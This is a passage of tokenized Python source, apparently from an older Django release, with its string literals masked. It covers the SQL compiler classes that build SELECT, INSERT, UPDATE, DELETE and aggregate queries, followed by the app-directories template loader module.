<EOL> ordering = self . connection . ops . force_no_ordering ( ) <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( grouping ) ) <EOL> params . extend ( gb_params ) <EOL> if having : <EOL> result . append ( '<STR_LIT>' % having ) <EOL> params . extend ( h_params ) <EOL> if ordering : <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( ordering ) ) <EOL> if with_limits : <EOL> if self . query . high_mark is not None : <EOL> result . append ( '<STR_LIT>' % ( self . query . high_mark - self . query . low_mark ) ) <EOL> if self . query . low_mark : <EOL> if self . query . high_mark is None : <EOL> val = self . connection . ops . no_limit_value ( ) <EOL> if val : <EOL> result . append ( '<STR_LIT>' % val ) <EOL> result . append ( '<STR_LIT>' % self . query . 
low_mark ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( params ) <EOL> def as_nested_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . query . clone ( ) <EOL> if obj . low_mark == <NUM_LIT:0> and obj . high_mark is None : <EOL> obj . clear_ordering ( True ) <EOL> obj . bump_prefix ( ) <EOL> return obj . get_compiler ( connection = self . connection ) . as_sql ( ) <EOL> def get_columns ( self , with_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> result = [ '<STR_LIT>' % ( col [ <NUM_LIT:0> ] , qn2 ( alias ) ) for alias , col in self . query . extra_select . iteritems ( ) ] <EOL> aliases = set ( self . query . extra_select . keys ( ) ) <EOL> if with_aliases : <EOL> col_aliases = aliases . copy ( ) <EOL> else : <EOL> col_aliases = set ( ) <EOL> if self . query . select : <EOL> only_load = self . deferred_to_columns ( ) <EOL> for col in self . query . select : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> alias , column = col <EOL> table = self . query . alias_map [ alias ] [ TABLE_NAME ] <EOL> if table in only_load and col not in only_load [ table ] : <EOL> continue <EOL> r = '<STR_LIT>' % ( qn ( alias ) , qn ( column ) ) <EOL> if with_aliases : <EOL> if col [ <NUM_LIT:1> ] in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( '<STR_LIT>' % ( r , qn2 ( col [ <NUM_LIT:1> ] ) ) ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> if hasattr ( col , '<STR_LIT>' ) : <EOL> aliases . add ( col . alias ) <EOL> col_aliases . add ( col . alias ) <EOL> elif self . 
query . default_cols : <EOL> cols , new_aliases = self . get_default_columns ( with_aliases , <EOL> col_aliases ) <EOL> result . extend ( cols ) <EOL> aliases . update ( new_aliases ) <EOL> max_name_length = self . connection . ops . max_name_length ( ) <EOL> result . extend ( [ <EOL> '<STR_LIT>' % ( <EOL> aggregate . as_sql ( qn , self . connection ) , <EOL> alias is not None <EOL> and '<STR_LIT>' % qn ( truncate_name ( alias , max_name_length ) ) <EOL> or '<STR_LIT>' <EOL> ) <EOL> for alias , aggregate in self . query . aggregate_select . items ( ) <EOL> ] ) <EOL> for table , col in self . query . related_select_cols : <EOL> r = '<STR_LIT>' % ( qn ( table ) , qn ( col ) ) <EOL> if with_aliases and col in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col ) <EOL> self . _select_aliases = aliases <EOL> return result <EOL> def get_default_columns ( self , with_aliases = False , col_aliases = None , <EOL> start_alias = None , opts = None , as_pairs = False , local_only = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if opts is None : <EOL> opts = self . query . model . _meta <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> aliases = set ( ) <EOL> only_load = self . deferred_to_columns ( ) <EOL> proxied_model = get_proxied_model ( opts ) <EOL> if start_alias : <EOL> seen = { None : start_alias } <EOL> for field , model in opts . get_fields_with_model ( ) : <EOL> if local_only and model is not None : <EOL> continue <EOL> if start_alias : <EOL> try : <EOL> alias = seen [ model ] <EOL> except KeyError : <EOL> if model is proxied_model : <EOL> alias = start_alias <EOL> else : <EOL> link_field = opts . get_ancestor_link ( model ) <EOL> alias = self . query . 
join ( ( start_alias , model . _meta . db_table , <EOL> link_field . column , model . _meta . pk . column ) ) <EOL> seen [ model ] = alias <EOL> else : <EOL> alias = self . query . included_inherited_models [ model ] <EOL> table = self . query . alias_map [ alias ] [ TABLE_NAME ] <EOL> if table in only_load and field . column not in only_load [ table ] : <EOL> continue <EOL> if as_pairs : <EOL> result . append ( ( alias , field . column ) ) <EOL> aliases . add ( alias ) <EOL> continue <EOL> if with_aliases and field . column in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( qn ( alias ) , <EOL> qn2 ( field . column ) , c_alias ) ) <EOL> col_aliases . add ( c_alias ) <EOL> aliases . add ( c_alias ) <EOL> else : <EOL> r = '<STR_LIT>' % ( qn ( alias ) , qn2 ( field . column ) ) <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> if with_aliases : <EOL> col_aliases . add ( field . column ) <EOL> return result , aliases <EOL> def get_ordering ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . query . extra_order_by : <EOL> ordering = self . query . extra_order_by <EOL> elif not self . query . default_ordering : <EOL> ordering = self . query . order_by <EOL> else : <EOL> ordering = self . query . order_by or self . query . model . _meta . ordering <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> distinct = self . query . distinct <EOL> select_aliases = self . _select_aliases <EOL> result = [ ] <EOL> group_by = [ ] <EOL> ordering_aliases = [ ] <EOL> if self . query . standard_ordering : <EOL> asc , desc = ORDER_DIR [ '<STR_LIT>' ] <EOL> else : <EOL> asc , desc = ORDER_DIR [ '<STR_LIT>' ] <EOL> processed_pairs = set ( ) <EOL> for field in ordering : <EOL> if field == '<STR_LIT:?>' : <EOL> result . append ( self . connection . ops . 
random_function_sql ( ) ) <EOL> continue <EOL> if isinstance ( field , int ) : <EOL> if field < <NUM_LIT:0> : <EOL> order = desc <EOL> field = - field <EOL> else : <EOL> order = asc <EOL> result . append ( '<STR_LIT>' % ( field , order ) ) <EOL> group_by . append ( ( field , [ ] ) ) <EOL> continue <EOL> col , order = get_order_dir ( field , asc ) <EOL> if col in self . query . aggregate_select : <EOL> result . append ( '<STR_LIT>' % ( qn ( col ) , order ) ) <EOL> continue <EOL> if '<STR_LIT:.>' in field : <EOL> table , col = col . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if ( table , col ) not in processed_pairs : <EOL> elt = '<STR_LIT>' % ( qn ( table ) , col ) <EOL> processed_pairs . add ( ( table , col ) ) <EOL> if not distinct or elt in select_aliases : <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( ( elt , [ ] ) ) <EOL> elif get_order_dir ( field ) [ <NUM_LIT:0> ] not in self . query . extra_select : <EOL> for table , col , order in self . find_ordering_name ( field , <EOL> self . query . model . _meta , default_order = asc ) : <EOL> if ( table , col ) not in processed_pairs : <EOL> elt = '<STR_LIT>' % ( qn ( table ) , qn2 ( col ) ) <EOL> processed_pairs . add ( ( table , col ) ) <EOL> if distinct and elt not in select_aliases : <EOL> ordering_aliases . append ( elt ) <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( ( elt , [ ] ) ) <EOL> else : <EOL> elt = qn2 ( col ) <EOL> if distinct and col not in select_aliases : <EOL> ordering_aliases . append ( elt ) <EOL> result . append ( '<STR_LIT>' % ( elt , order ) ) <EOL> group_by . append ( self . query . extra_select [ col ] ) <EOL> self . query . ordering_aliases = ordering_aliases <EOL> return result , group_by <EOL> def find_ordering_name ( self , name , opts , alias = None , default_order = '<STR_LIT>' , <EOL> already_seen = None ) : <EOL> """<STR_LIT>""" <EOL> name , order = get_order_dir ( name , default_order ) <EOL> pieces = name . 
split ( LOOKUP_SEP ) <EOL> if not alias : <EOL> alias = self . query . get_initial_alias ( ) <EOL> field , target , opts , joins , last , extra = self . query . setup_joins ( pieces , <EOL> opts , alias , False ) <EOL> alias = joins [ - <NUM_LIT:1> ] <EOL> col = target . column <EOL> if not field . rel : <EOL> self . query . ref_alias ( alias ) <EOL> self . query . promote_alias_chain ( joins , <EOL> self . query . alias_map [ joins [ <NUM_LIT:0> ] ] [ JOIN_TYPE ] == self . query . LOUTER ) <EOL> if field . rel and len ( joins ) > <NUM_LIT:1> and opts . ordering : <EOL> if not already_seen : <EOL> already_seen = set ( ) <EOL> join_tuple = tuple ( [ self . query . alias_map [ j ] [ TABLE_NAME ] for j in joins ] ) <EOL> if join_tuple in already_seen : <EOL> raise FieldError ( '<STR_LIT>' ) <EOL> already_seen . add ( join_tuple ) <EOL> results = [ ] <EOL> for item in opts . ordering : <EOL> results . extend ( self . find_ordering_name ( item , opts , alias , <EOL> order , already_seen ) ) <EOL> return results <EOL> if alias : <EOL> while <NUM_LIT:1> : <EOL> join = self . query . alias_map [ alias ] <EOL> if col != join [ RHS_JOIN_COL ] : <EOL> break <EOL> self . query . unref_alias ( alias ) <EOL> alias = join [ LHS_ALIAS ] <EOL> col = join [ LHS_JOIN_COL ] <EOL> return [ ( alias , col , order ) ] <EOL> def get_from_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> first = True <EOL> for alias in self . query . tables : <EOL> if not self . query . alias_refcount [ alias ] : <EOL> continue <EOL> try : <EOL> name , alias , join_type , lhs , lhs_col , col , nullable = self . query . alias_map [ alias ] <EOL> except KeyError : <EOL> continue <EOL> alias_str = ( alias != name and '<STR_LIT>' % alias or '<STR_LIT>' ) <EOL> if join_type and not first : <EOL> result . 
append ( '<STR_LIT>' <EOL> % ( join_type , qn ( name ) , alias_str , qn ( lhs ) , <EOL> qn2 ( lhs_col ) , qn ( alias ) , qn2 ( col ) ) ) <EOL> else : <EOL> connector = not first and '<STR_LIT:U+002CU+0020>' or '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( connector , qn ( name ) , alias_str ) ) <EOL> first = False <EOL> for t in self . query . extra_tables : <EOL> alias , unused = self . query . table_alias ( t ) <EOL> if alias not in self . query . alias_map or self . query . alias_refcount [ alias ] == <NUM_LIT:1> : <EOL> connector = not first and '<STR_LIT:U+002CU+0020>' or '<STR_LIT>' <EOL> result . append ( '<STR_LIT>' % ( connector , qn ( alias ) ) ) <EOL> first = False <EOL> return result , [ ] <EOL> def get_grouping ( self ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> result , params = [ ] , [ ] <EOL> if self . query . group_by is not None : <EOL> if ( len ( self . query . model . _meta . fields ) == len ( self . query . select ) and <EOL> self . connection . features . allows_group_by_pk ) : <EOL> self . query . group_by = [ <EOL> ( self . query . model . _meta . db_table , self . query . model . _meta . pk . column ) <EOL> ] <EOL> group_by = self . query . group_by or [ ] <EOL> extra_selects = [ ] <EOL> for extra_select , extra_params in self . query . extra_select . itervalues ( ) : <EOL> extra_selects . append ( extra_select ) <EOL> params . extend ( extra_params ) <EOL> cols = ( group_by + self . query . select + <EOL> self . query . related_select_cols + extra_selects ) <EOL> for col in cols : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> result . append ( '<STR_LIT>' % ( qn ( col [ <NUM_LIT:0> ] ) , qn ( col [ <NUM_LIT:1> ] ) ) ) <EOL> elif hasattr ( col , '<STR_LIT>' ) : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> else : <EOL> result . 
append ( '<STR_LIT>' % str ( col ) ) <EOL> return result , params <EOL> def fill_related_selections ( self , opts = None , root_alias = None , cur_depth = <NUM_LIT:1> , <EOL> used = None , requested = None , restricted = None , nullable = None , <EOL> dupe_set = None , avoid_set = None ) : <EOL> """<STR_LIT>""" <EOL> if not restricted and self . query . max_depth and cur_depth > self . query . max_depth : <EOL> return <EOL> if not opts : <EOL> opts = self . query . get_meta ( ) <EOL> root_alias = self . query . get_initial_alias ( ) <EOL> self . query . related_select_cols = [ ] <EOL> self . query . related_select_fields = [ ] <EOL> if not used : <EOL> used = set ( ) <EOL> if dupe_set is None : <EOL> dupe_set = set ( ) <EOL> if avoid_set is None : <EOL> avoid_set = set ( ) <EOL> orig_dupe_set = dupe_set <EOL> if requested is None : <EOL> if isinstance ( self . query . select_related , dict ) : <EOL> requested = self . query . select_related <EOL> restricted = True <EOL> else : <EOL> restricted = False <EOL> for f , model in opts . get_fields_with_model ( ) : <EOL> if not select_related_descend ( f , restricted , requested ) : <EOL> continue <EOL> avoid = avoid_set . copy ( ) <EOL> dupe_set = orig_dupe_set . copy ( ) <EOL> table = f . rel . to . _meta . db_table <EOL> promote = nullable or f . null <EOL> if model : <EOL> int_opts = opts <EOL> alias = root_alias <EOL> alias_chain = [ ] <EOL> for int_model in opts . get_base_chain ( model ) : <EOL> if not int_opts . parents [ int_model ] : <EOL> int_opts = int_model . _meta <EOL> continue <EOL> lhs_col = int_opts . parents [ int_model ] . column <EOL> dedupe = lhs_col in opts . duplicate_targets <EOL> if dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , lhs_col ) , <EOL> ( ) ) ) <EOL> dupe_set . add ( ( opts , lhs_col ) ) <EOL> int_opts = int_model . _meta <EOL> alias = self . query . join ( ( alias , int_opts . db_table , lhs_col , <EOL> int_opts . pk . 
column ) , exclusions = used , <EOL> promote = promote ) <EOL> alias_chain . append ( alias ) <EOL> for ( dupe_opts , dupe_col ) in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> if self . query . alias_map [ root_alias ] [ JOIN_TYPE ] == self . query . LOUTER : <EOL> self . query . promote_alias_chain ( alias_chain , True ) <EOL> else : <EOL> alias = root_alias <EOL> dedupe = f . column in opts . duplicate_targets <EOL> if dupe_set or dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , f . column ) , ( ) ) ) <EOL> if dedupe : <EOL> dupe_set . add ( ( opts , f . column ) ) <EOL> alias = self . query . join ( ( alias , table , f . column , <EOL> f . rel . get_related_field ( ) . column ) , <EOL> exclusions = used . union ( avoid ) , promote = promote ) <EOL> used . add ( alias ) <EOL> columns , aliases = self . get_default_columns ( start_alias = alias , <EOL> opts = f . rel . to . _meta , as_pairs = True ) <EOL> self . query . related_select_cols . extend ( columns ) <EOL> if self . query . alias_map [ alias ] [ JOIN_TYPE ] == self . query . LOUTER : <EOL> self . query . promote_alias_chain ( aliases , True ) <EOL> self . query . related_select_fields . extend ( f . rel . to . _meta . fields ) <EOL> if restricted : <EOL> next = requested . get ( f . name , { } ) <EOL> else : <EOL> next = False <EOL> new_nullable = f . null or promote <EOL> for dupe_opts , dupe_col in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> self . fill_related_selections ( f . rel . to . _meta , alias , cur_depth + <NUM_LIT:1> , <EOL> used , next , restricted , new_nullable , dupe_set , avoid ) <EOL> if restricted : <EOL> related_fields = [ <EOL> ( o . field , o . model ) <EOL> for o in opts . get_all_related_objects ( ) <EOL> if o . field . 
unique <EOL> ] <EOL> for f , model in related_fields : <EOL> if not select_related_descend ( f , restricted , requested , reverse = True ) : <EOL> continue <EOL> avoid = avoid_set . copy ( ) <EOL> dupe_set = orig_dupe_set . copy ( ) <EOL> table = model . _meta . db_table <EOL> int_opts = opts <EOL> alias = root_alias <EOL> alias_chain = [ ] <EOL> chain = opts . get_base_chain ( f . rel . to ) <EOL> if chain is not None : <EOL> for int_model in chain : <EOL> if not int_opts . parents [ int_model ] : <EOL> int_opts = int_model . _meta <EOL> continue <EOL> lhs_col = int_opts . parents [ int_model ] . column <EOL> dedupe = lhs_col in opts . duplicate_targets <EOL> if dedupe : <EOL> avoid . update ( ( self . query . dupe_avoidance . get ( id ( opts ) , lhs_col ) , <EOL> ( ) ) ) <EOL> dupe_set . add ( ( opts , lhs_col ) ) <EOL> int_opts = int_model . _meta <EOL> alias = self . query . join ( <EOL> ( alias , int_opts . db_table , lhs_col , int_opts . pk . column ) , <EOL> exclusions = used , promote = True , reuse = used <EOL> ) <EOL> alias_chain . append ( alias ) <EOL> for dupe_opts , dupe_col in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> dedupe = f . column in opts . duplicate_targets <EOL> if dupe_set or dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , f . column ) , ( ) ) ) <EOL> if dedupe : <EOL> dupe_set . add ( ( opts , f . column ) ) <EOL> alias = self . query . join ( <EOL> ( alias , table , f . rel . get_related_field ( ) . column , f . column ) , <EOL> exclusions = used . union ( avoid ) , <EOL> promote = True <EOL> ) <EOL> used . add ( alias ) <EOL> columns , aliases = self . get_default_columns ( start_alias = alias , <EOL> opts = model . _meta , as_pairs = True , local_only = True ) <EOL> self . query . related_select_cols . extend ( columns ) <EOL> self . query . related_select_fields . extend ( model . _meta . fields ) <EOL> next = requested . get ( f . 
related_query_name ( ) , { } ) <EOL> new_nullable = f . null or None <EOL> self . fill_related_selections ( model . _meta , table , cur_depth + <NUM_LIT:1> , <EOL> used , next , restricted , new_nullable ) <EOL> def deferred_to_columns ( self ) : <EOL> """<STR_LIT>""" <EOL> columns = { } <EOL> self . query . deferred_to_data ( columns , self . query . deferred_to_columns_cb ) <EOL> return columns <EOL> def results_iter ( self ) : <EOL> """<STR_LIT>""" <EOL> resolve_columns = hasattr ( self , '<STR_LIT>' ) <EOL> fields = None <EOL> has_aggregate_select = bool ( self . query . aggregate_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> if resolve_columns : <EOL> if fields is None : <EOL> if self . query . select_fields : <EOL> fields = self . query . select_fields + self . query . related_select_fields <EOL> else : <EOL> fields = self . query . model . _meta . fields <EOL> only_load = self . deferred_to_columns ( ) <EOL> if only_load : <EOL> db_table = self . query . model . _meta . db_table <EOL> fields = [ f for f in fields if db_table in only_load and <EOL> f . column in only_load [ db_table ] ] <EOL> row = self . resolve_columns ( row , fields ) <EOL> if has_aggregate_select : <EOL> aggregate_start = len ( self . query . extra_select . keys ( ) ) + len ( self . query . select ) <EOL> aggregate_end = aggregate_start + len ( self . query . aggregate_select ) <EOL> row = tuple ( row [ : aggregate_start ] ) + tuple ( [ <EOL> self . query . resolve_aggregate ( value , aggregate , self . connection ) <EOL> for ( alias , aggregate ) , value <EOL> in zip ( self . query . aggregate_select . items ( ) , row [ aggregate_start : aggregate_end ] ) <EOL> ] ) + tuple ( row [ aggregate_end : ] ) <EOL> yield row <EOL> def execute_sql ( self , result_type = MULTI ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> sql , params = self . 
as_sql ( ) <EOL> if not sql : <EOL> raise EmptyResultSet <EOL> except EmptyResultSet : <EOL> if result_type == MULTI : <EOL> return empty_iter ( ) <EOL> else : <EOL> return <EOL> cursor = self . connection . cursor ( ) <EOL> cursor . execute ( sql , params ) <EOL> if not result_type : <EOL> return cursor <EOL> if result_type == SINGLE : <EOL> if self . query . ordering_aliases : <EOL> return cursor . fetchone ( ) [ : - len ( self . query . ordering_aliases ) ] <EOL> return cursor . fetchone ( ) <EOL> if self . query . ordering_aliases : <EOL> result = order_modified_iter ( cursor , len ( self . query . ordering_aliases ) , <EOL> self . connection . features . empty_fetchmany_value ) <EOL> else : <EOL> result = iter ( ( lambda : cursor . fetchmany ( GET_ITERATOR_CHUNK_SIZE ) ) , <EOL> self . connection . features . empty_fetchmany_value ) <EOL> if not self . connection . features . can_use_chunked_reads : <EOL> return list ( result ) <EOL> return result <EOL> class SQLInsertCompiler ( SQLCompiler ) : <EOL> def placeholder ( self , field , val ) : <EOL> if field is None : <EOL> return val <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> return field . get_placeholder ( val , self . connection ) <EOL> else : <EOL> return '<STR_LIT:%s>' <EOL> def as_sql ( self ) : <EOL> qn = self . connection . ops . quote_name <EOL> opts = self . query . model . _meta <EOL> result = [ '<STR_LIT>' % qn ( opts . db_table ) ] <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ qn ( c ) for c in self . query . columns ] ) ) <EOL> values = [ self . placeholder ( * v ) for v in self . query . values ] <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( values ) ) <EOL> params = self . query . params <EOL> if self . return_id and self . connection . features . can_return_id_from_insert : <EOL> col = "<STR_LIT>" % ( qn ( opts . db_table ) , qn ( opts . pk . column ) ) <EOL> r_fmt , r_params = self . connection . ops . 
return_insert_id ( ) <EOL> result . append ( r_fmt % col ) <EOL> params = params + r_params <EOL> return '<STR_LIT:U+0020>' . join ( result ) , params <EOL> def execute_sql ( self , return_id = False ) : <EOL> self . return_id = return_id <EOL> cursor = super ( SQLInsertCompiler , self ) . execute_sql ( None ) <EOL> if not ( return_id and cursor ) : <EOL> return <EOL> if self . connection . features . can_return_id_from_insert : <EOL> return self . connection . ops . fetch_returned_insert_id ( cursor ) <EOL> return self . connection . ops . last_insert_id ( cursor , <EOL> self . query . model . _meta . db_table , self . query . model . _meta . pk . column ) <EOL> class SQLDeleteCompiler ( SQLCompiler ) : <EOL> def as_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> assert len ( self . query . tables ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> qn = self . quote_name_unless_alias <EOL> result = [ '<STR_LIT>' % qn ( self . query . tables [ <NUM_LIT:0> ] ) ] <EOL> where , params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> result . append ( '<STR_LIT>' % where ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( params ) <EOL> class SQLUpdateCompiler ( SQLCompiler ) : <EOL> def as_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . base import Model <EOL> self . pre_sql_setup ( ) <EOL> if not self . query . values : <EOL> return '<STR_LIT>' , ( ) <EOL> table = self . query . tables [ <NUM_LIT:0> ] <EOL> qn = self . quote_name_unless_alias <EOL> result = [ '<STR_LIT>' % qn ( table ) ] <EOL> result . append ( '<STR_LIT>' ) <EOL> values , update_params = [ ] , [ ] <EOL> for field , model , val in self . query . values : <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> val = val . prepare_database_save ( field ) <EOL> else : <EOL> val = field . get_db_prep_save ( val , connection = self . connection ) <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> placeholder = field . get_placeholder ( val , self . 
connection ) <EOL> else : <EOL> placeholder = '<STR_LIT:%s>' <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> val = SQLEvaluator ( val , self . query , allow_joins = False ) <EOL> name = field . column <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> sql , params = val . as_sql ( qn , self . connection ) <EOL> values . append ( '<STR_LIT>' % ( qn ( name ) , sql ) ) <EOL> update_params . extend ( params ) <EOL> elif val is not None : <EOL> values . append ( '<STR_LIT>' % ( qn ( name ) , placeholder ) ) <EOL> update_params . append ( val ) <EOL> else : <EOL> values . append ( '<STR_LIT>' % qn ( name ) ) <EOL> if not values : <EOL> return '<STR_LIT>' , ( ) <EOL> result . append ( '<STR_LIT:U+002CU+0020>' . join ( values ) ) <EOL> where , params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> if where : <EOL> result . append ( '<STR_LIT>' % where ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( update_params + params ) <EOL> def execute_sql ( self , result_type ) : <EOL> """<STR_LIT>""" <EOL> cursor = super ( SQLUpdateCompiler , self ) . execute_sql ( result_type ) <EOL> rows = cursor and cursor . rowcount or <NUM_LIT:0> <EOL> is_empty = cursor is None <EOL> del cursor <EOL> for query in self . query . get_related_updates ( ) : <EOL> aux_rows = query . get_compiler ( self . using ) . execute_sql ( result_type ) <EOL> if is_empty : <EOL> rows = aux_rows <EOL> is_empty = False <EOL> return rows <EOL> def pre_sql_setup ( self ) : <EOL> """<STR_LIT>""" <EOL> self . query . select_related = False <EOL> self . query . clear_ordering ( True ) <EOL> super ( SQLUpdateCompiler , self ) . pre_sql_setup ( ) <EOL> count = self . query . count_active_tables ( ) <EOL> if not self . query . related_updates and count == <NUM_LIT:1> : <EOL> return <EOL> query = self . query . clone ( klass = Query ) <EOL> query . bump_prefix ( ) <EOL> query . extra = { } <EOL> query . select = [ ] <EOL> query . add_fields ( [ query . model . _meta . pk . 
name ] ) <EOL> must_pre_select = count > <NUM_LIT:1> and not self . connection . features . update_can_self_select <EOL> self . query . where = self . query . where_class ( ) <EOL> if self . query . related_updates or must_pre_select : <EOL> idents = [ ] <EOL> for rows in query . get_compiler ( self . using ) . execute_sql ( MULTI ) : <EOL> idents . extend ( [ r [ <NUM_LIT:0> ] for r in rows ] ) <EOL> self . query . add_filter ( ( '<STR_LIT>' , idents ) ) <EOL> self . query . related_ids = idents <EOL> else : <EOL> self . query . add_filter ( ( '<STR_LIT>' , query ) ) <EOL> for alias in self . query . tables [ <NUM_LIT:1> : ] : <EOL> self . query . alias_refcount [ alias ] = <NUM_LIT:0> <EOL> class SQLAggregateCompiler ( SQLCompiler ) : <EOL> def as_sql ( self , qn = None ) : <EOL> """<STR_LIT>""" <EOL> if qn is None : <EOL> qn = self . quote_name_unless_alias <EOL> sql = ( '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> aggregate . as_sql ( qn , self . connection ) <EOL> for aggregate in self . query . aggregate_select . values ( ) <EOL> ] ) , <EOL> self . query . subquery ) <EOL> ) <EOL> params = self . query . sub_params <EOL> return ( sql , params ) <EOL> class SQLDateCompiler ( SQLCompiler ) : <EOL> def results_iter ( self ) : <EOL> """<STR_LIT>""" <EOL> resolve_columns = hasattr ( self , '<STR_LIT>' ) <EOL> if resolve_columns : <EOL> from django . db . models . fields import DateTimeField <EOL> fields = [ DateTimeField ( ) ] <EOL> else : <EOL> from django . db . backends . util import typecast_timestamp <EOL> needs_string_cast = self . connection . features . needs_datetime_string_cast <EOL> offset = len ( self . query . extra_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> date = row [ offset ] <EOL> if resolve_columns : <EOL> date = self . 
resolve_columns ( row , fields ) [ offset ] <EOL> elif needs_string_cast : <EOL> date = typecast_timestamp ( str ( date ) ) <EOL> yield date <EOL> def empty_iter ( ) : <EOL> """<STR_LIT>""" <EOL> yield iter ( [ ] ) . next ( ) <EOL> def order_modified_iter ( cursor , trim , sentinel ) : <EOL> """<STR_LIT>""" <EOL> for rows in iter ( ( lambda : cursor . fetchmany ( GET_ITERATOR_CHUNK_SIZE ) ) , <EOL> sentinel ) : <EOL> yield [ r [ : - trim ] for r in rows ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . template . base import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> from django . utils . _os import safe_join <EOL> from django . utils . importlib import import_module <EOL> fs_encoding = sys . getfilesystemencoding ( ) or sys . getdefaultencoding ( ) <EOL> app_template_dirs = [ ] <EOL> for app in settings . INSTALLED_APPS : <EOL> try : <EOL> mod = import_module ( app ) <EOL> except ImportError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( app , e . args [ <NUM_LIT:0> ] ) ) <EOL> template_dir = os . path . join ( os . path . dirname ( mod . __file__ ) , '<STR_LIT>' ) <EOL> if os . path . isdir ( template_dir ) : <EOL> app_template_dirs . append ( template_dir . decode ( fs_encoding ) ) <EOL> app_template_dirs = tuple ( app_template_dirs ) <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def get_template_sources ( self , template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if not template_dirs : <EOL> template_dirs = app_template_dirs <EOL> for template_dir in template_dirs : <EOL> try : <EOL> yield safe_join ( template_dir , template_name ) <EOL> except UnicodeDecodeError : <EOL> raise <EOL> except ValueError : <EOL> pass <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> for filepath in self . get_template_sources ( template_name , template_dirs ) : <EOL> try : <EOL> file = open ( filepath ) <EOL> try : <EOL> return ( file . read ( ) . decode ( settings . FILE_CHARSET ) , filepath ) <EOL> finally : <EOL> file . close ( ) <EOL> except IOError : <EOL> pass <EOL> raise TemplateDoesNotExist ( template_name ) <EOL> _loader = Loader ( ) <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> import warnings <EOL> warnings . 
warn ( <EOL> "<STR_LIT>" , <EOL> DeprecationWarning <EOL> ) <EOL> return _loader . load_template_source ( template_name , template_dirs ) <EOL> load_template_source . is_usable = True </s>
